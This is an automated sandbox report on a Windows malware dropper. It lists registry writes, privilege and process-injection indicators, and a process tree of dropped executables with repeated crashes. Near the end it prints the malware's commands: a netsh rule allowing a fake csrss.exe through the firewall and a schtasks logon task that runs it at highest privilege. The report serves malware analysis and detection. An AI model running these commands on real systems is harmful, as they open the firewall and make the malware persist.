Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	Graphics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exeGraphics.exeGraphics.exe

pid	process
5064	pub2.exe
5064	pub2.exe
2760	jfiag3g_gg.exe
2760	jfiag3g_gg.exe
1708	Graphics.exe
1708	Graphics.exe
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2308	Graphics.exe
2308	Graphics.exe
2308	Graphics.exe
2308	Graphics.exe
2308	Graphics.exe
2308	Graphics.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2352
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

5064 pub2.exe

pid	process
2352

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exeGraphics.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3472	SoCleanInst.exe
Token: SeCreateTokenPrivilege	3600	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3600	Install.exe
Token: SeLockMemoryPrivilege	3600	Install.exe
Token: SeIncreaseQuotaPrivilege	3600	Install.exe
Token: SeMachineAccountPrivilege	3600	Install.exe
Token: SeTcbPrivilege	3600	Install.exe
Token: SeSecurityPrivilege	3600	Install.exe
Token: SeTakeOwnershipPrivilege	3600	Install.exe
Token: SeLoadDriverPrivilege	3600	Install.exe
Token: SeSystemProfilePrivilege	3600	Install.exe
Token: SeSystemtimePrivilege	3600	Install.exe
Token: SeProfSingleProcessPrivilege	3600	Install.exe
Token: SeIncBasePriorityPrivilege	3600	Install.exe
Token: SeCreatePagefilePrivilege	3600	Install.exe
Token: SeCreatePermanentPrivilege	3600	Install.exe
Token: SeBackupPrivilege	3600	Install.exe
Token: SeRestorePrivilege	3600	Install.exe
Token: SeShutdownPrivilege	3600	Install.exe
Token: SeDebugPrivilege	3600	Install.exe
Token: SeAuditPrivilege	3600	Install.exe
Token: SeSystemEnvironmentPrivilege	3600	Install.exe
Token: SeChangeNotifyPrivilege	3600	Install.exe
Token: SeRemoteShutdownPrivilege	3600	Install.exe
Token: SeUndockPrivilege	3600	Install.exe
Token: SeSyncAgentPrivilege	3600	Install.exe
Token: SeEnableDelegationPrivilege	3600	Install.exe
Token: SeManageVolumePrivilege	3600	Install.exe
Token: SeImpersonatePrivilege	3600	Install.exe
Token: SeCreateGlobalPrivilege	3600	Install.exe
Token: 31	3600	Install.exe
Token: 32	3600	Install.exe
Token: 33	3600	Install.exe
Token: 34	3600	Install.exe
Token: 35	3600	Install.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeManageVolumePrivilege	1964	md9_1sjm.exe
Token: SeDebugPrivilege	1708	Graphics.exe
Token: SeImpersonatePrivilege	1708	Graphics.exe
Token: SeTcbPrivilege	4832	svchost.exe
Token: SeTcbPrivilege	4832	svchost.exe
Token: SeManageVolumePrivilege	1964	md9_1sjm.exe
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352

Suspicious use of SetWindowsHookEx 23 IoCs

Processes:

2k0jZyWme9GDpIPjvWDInG3u.exeZl24LnHuyGBD5OWSbFFM4try.exekvXZVpfZ9LIxh3osku_qtWIw.exeCm7hMi4z6J7v5BvaID5_0cGP.exelF_BTdudT4N1fD228SRrnz8Z.exe4CstJgsoYTy2Cc4CN12NOQ1e.exeCv2yiwZ0DoAfFpoEBg9RejWc.exefHuYJ85vvIxMcwCJyqcaeeZo.exevarpFOxgffuKEQr5qL51JxW9.exeXATgDymb5qZqzyRLDWsDSHhN.exeZERYQhznAc32wXq6KBsRAz1a.exeJ9fO8GZKZyLAaQ3kvYdX7keV.exebXh1QKu8V1zCYtGKLXVTIuTD.exei0HjeC3T2g2fWv95jSegoMp3.exebs9JP9UkWEMiMXNn8Ws60fL7.exeRkC4INfT6KZTn6DHkfTo_WSM.exeInstall.exeCm7hMi4z6J7v5BvaID5_0cGP.exeAppLaunch.exeAppLaunch.exeAppLaunch.exeAppLaunch.exeAppLaunch.exe

pid	process
2584	2k0jZyWme9GDpIPjvWDInG3u.exe
220	Zl24LnHuyGBD5OWSbFFM4try.exe
2376	kvXZVpfZ9LIxh3osku_qtWIw.exe
2164	Cm7hMi4z6J7v5BvaID5_0cGP.exe
3696	lF_BTdudT4N1fD228SRrnz8Z.exe
3172	4CstJgsoYTy2Cc4CN12NOQ1e.exe
4404	Cv2yiwZ0DoAfFpoEBg9RejWc.exe
3120	fHuYJ85vvIxMcwCJyqcaeeZo.exe
3328	varpFOxgffuKEQr5qL51JxW9.exe
2244	XATgDymb5qZqzyRLDWsDSHhN.exe
5068	ZERYQhznAc32wXq6KBsRAz1a.exe
4448	J9fO8GZKZyLAaQ3kvYdX7keV.exe
2008	bXh1QKu8V1zCYtGKLXVTIuTD.exe
4440	i0HjeC3T2g2fWv95jSegoMp3.exe
3476	bs9JP9UkWEMiMXNn8Ws60fL7.exe
3096	RkC4INfT6KZTn6DHkfTo_WSM.exe
500	Install.exe
4368	Cm7hMi4z6J7v5BvaID5_0cGP.exe
1148	AppLaunch.exe
4700	AppLaunch.exe
1544	AppLaunch.exe
1784	AppLaunch.exe
4776	AppLaunch.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exeFiles.exeInstall.execmd.exesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 2032 wrote to memory of 3472	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	SoCleanInst.exe
PID 2032 wrote to memory of 3472	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	SoCleanInst.exe
PID 2032 wrote to memory of 1964	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	md9_1sjm.exe
PID 2032 wrote to memory of 1964	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	md9_1sjm.exe
PID 2032 wrote to memory of 1964	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	md9_1sjm.exe
PID 2032 wrote to memory of 4260	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Folder.exe
PID 2032 wrote to memory of 4260	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Folder.exe
PID 2032 wrote to memory of 4260	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Folder.exe
PID 2032 wrote to memory of 1708	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Graphics.exe
PID 2032 wrote to memory of 1708	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Graphics.exe
PID 2032 wrote to memory of 1708	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Graphics.exe
PID 2032 wrote to memory of 1284	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Updbdate.exe
PID 2032 wrote to memory of 1284	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Updbdate.exe
PID 2032 wrote to memory of 1284	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Updbdate.exe
PID 2032 wrote to memory of 3600	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Install.exe
PID 2032 wrote to memory of 3600	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Install.exe
PID 2032 wrote to memory of 3600	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Install.exe
PID 2032 wrote to memory of 3940	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Files.exe
PID 2032 wrote to memory of 3940	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Files.exe
PID 2032 wrote to memory of 3940	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	Files.exe
PID 2032 wrote to memory of 5064	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	pub2.exe
PID 2032 wrote to memory of 5064	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	pub2.exe
PID 2032 wrote to memory of 5064	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	pub2.exe
PID 2032 wrote to memory of 1352	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	File.exe
PID 2032 wrote to memory of 1352	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	File.exe
PID 2032 wrote to memory of 1352	2032	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe	File.exe
PID 3940 wrote to memory of 2248	3940	Files.exe	jfiag3g_gg.exe
PID 3940 wrote to memory of 2248	3940	Files.exe	jfiag3g_gg.exe
PID 3940 wrote to memory of 2248	3940	Files.exe	jfiag3g_gg.exe
PID 3600 wrote to memory of 3124	3600	Install.exe	cmd.exe
PID 3600 wrote to memory of 3124	3600	Install.exe	cmd.exe
PID 3600 wrote to memory of 3124	3600	Install.exe	cmd.exe
PID 3124 wrote to memory of 3620	3124	cmd.exe	taskkill.exe
PID 3124 wrote to memory of 3620	3124	cmd.exe	taskkill.exe
PID 3124 wrote to memory of 3620	3124	cmd.exe	taskkill.exe
PID 3940 wrote to memory of 2760	3940	Files.exe	jfiag3g_gg.exe
PID 3940 wrote to memory of 2760	3940	Files.exe	jfiag3g_gg.exe
PID 3940 wrote to memory of 2760	3940	Files.exe	jfiag3g_gg.exe
PID 4832 wrote to memory of 2308	4832	svchost.exe	Graphics.exe
PID 4832 wrote to memory of 2308	4832	svchost.exe	Graphics.exe
PID 4832 wrote to memory of 2308	4832	svchost.exe	Graphics.exe
PID 2308 wrote to memory of 3364	2308	Graphics.exe	cmd.exe
PID 2308 wrote to memory of 3364	2308	Graphics.exe	cmd.exe
PID 3364 wrote to memory of 3620	3364	cmd.exe	netsh.exe
PID 3364 wrote to memory of 3620	3364	cmd.exe	netsh.exe
PID 2308 wrote to memory of 1028	2308	Graphics.exe	csrss.exe
PID 2308 wrote to memory of 1028	2308	Graphics.exe	csrss.exe
PID 2308 wrote to memory of 1028	2308	Graphics.exe	csrss.exe
PID 4832 wrote to memory of 4216	4832	svchost.exe	schtasks.exe
PID 4832 wrote to memory of 4216	4832	svchost.exe	schtasks.exe
PID 1028 wrote to memory of 1448	1028	csrss.exe	injector.exe
PID 1028 wrote to memory of 1448	1028	csrss.exe	injector.exe
PID 1352 wrote to memory of 4836	1352	File.exe	5Pa6xL7OY2SJotggkqxVCL6D.exe
PID 1352 wrote to memory of 4836	1352	File.exe	5Pa6xL7OY2SJotggkqxVCL6D.exe
PID 1352 wrote to memory of 2584	1352	File.exe	2k0jZyWme9GDpIPjvWDInG3u.exe
PID 1352 wrote to memory of 2584	1352	File.exe	2k0jZyWme9GDpIPjvWDInG3u.exe
PID 1352 wrote to memory of 2584	1352	File.exe	2k0jZyWme9GDpIPjvWDInG3u.exe
PID 1352 wrote to memory of 2376	1352	File.exe	kvXZVpfZ9LIxh3osku_qtWIw.exe
PID 1352 wrote to memory of 2376	1352	File.exe	kvXZVpfZ9LIxh3osku_qtWIw.exe
PID 1352 wrote to memory of 2376	1352	File.exe	kvXZVpfZ9LIxh3osku_qtWIw.exe
PID 1352 wrote to memory of 220	1352	File.exe	Zl24LnHuyGBD5OWSbFFM4try.exe
PID 1352 wrote to memory of 220	1352	File.exe	Zl24LnHuyGBD5OWSbFFM4try.exe
PID 1352 wrote to memory of 220	1352	File.exe	Zl24LnHuyGBD5OWSbFFM4try.exe
PID 1352 wrote to memory of 3340	1352	File.exe	swtJPkoVDerZPYqhlGPwumOz.exe

C:\Users\Admin\AppData\Local\Temp\d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe
"C:\Users\Admin\AppData\Local\Temp\d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2032

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:4260

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 328
3⤵
- Program crash
PID:3084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 332
3⤵
- Program crash
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 332
3⤵
- Program crash
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 664
3⤵
- Program crash
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 664
3⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 664
3⤵
- Program crash
PID:3320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 664
3⤵
- Program crash
PID:3884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 728
3⤵
- Program crash
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 756
3⤵
- Program crash
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 868
3⤵
- Program crash
PID:1116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 792
3⤵
- Program crash
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 892
3⤵
- Program crash
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 916
3⤵
- Program crash
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 916
3⤵
- Program crash
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 696
3⤵
- Program crash
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 696
3⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 616
3⤵
- Program crash
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 868
3⤵
- Program crash
PID:2692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 912
3⤵
- Program crash
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 856
3⤵
- Program crash
PID:3084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 768
3⤵
- Program crash
PID:4964

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 292
4⤵
- Program crash
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 296
4⤵
- Program crash
PID:2872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 296
4⤵
- Program crash
PID:2784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 636
4⤵
- Program crash
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 636
4⤵
- Program crash
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 676
4⤵
- Program crash
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 676
4⤵
- Program crash
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 700
4⤵
- Program crash
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 724
4⤵
- Program crash
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 580
4⤵
- Program crash
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 768
4⤵
- Program crash
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 580
4⤵
- Program crash
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 744
4⤵
- Program crash
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 856
4⤵
- Program crash
PID:3144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 616
4⤵
- Program crash
PID:2424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 904
4⤵
- Program crash
PID:3216

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3364

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3620

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 328
5⤵
- Program crash
PID:100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 332
5⤵
- Program crash
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 332
5⤵
- Program crash
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 668
5⤵
- Program crash
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 668
5⤵
- Program crash
PID:332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 668
5⤵
- Program crash
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 732
5⤵
- Program crash
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 740
5⤵
- Program crash
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 756
5⤵
- Program crash
PID:1216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 632
5⤵
- Program crash
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 748
5⤵
- Program crash
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 600
5⤵
- Program crash
PID:368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 968
5⤵
- Program crash
PID:4188

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4216

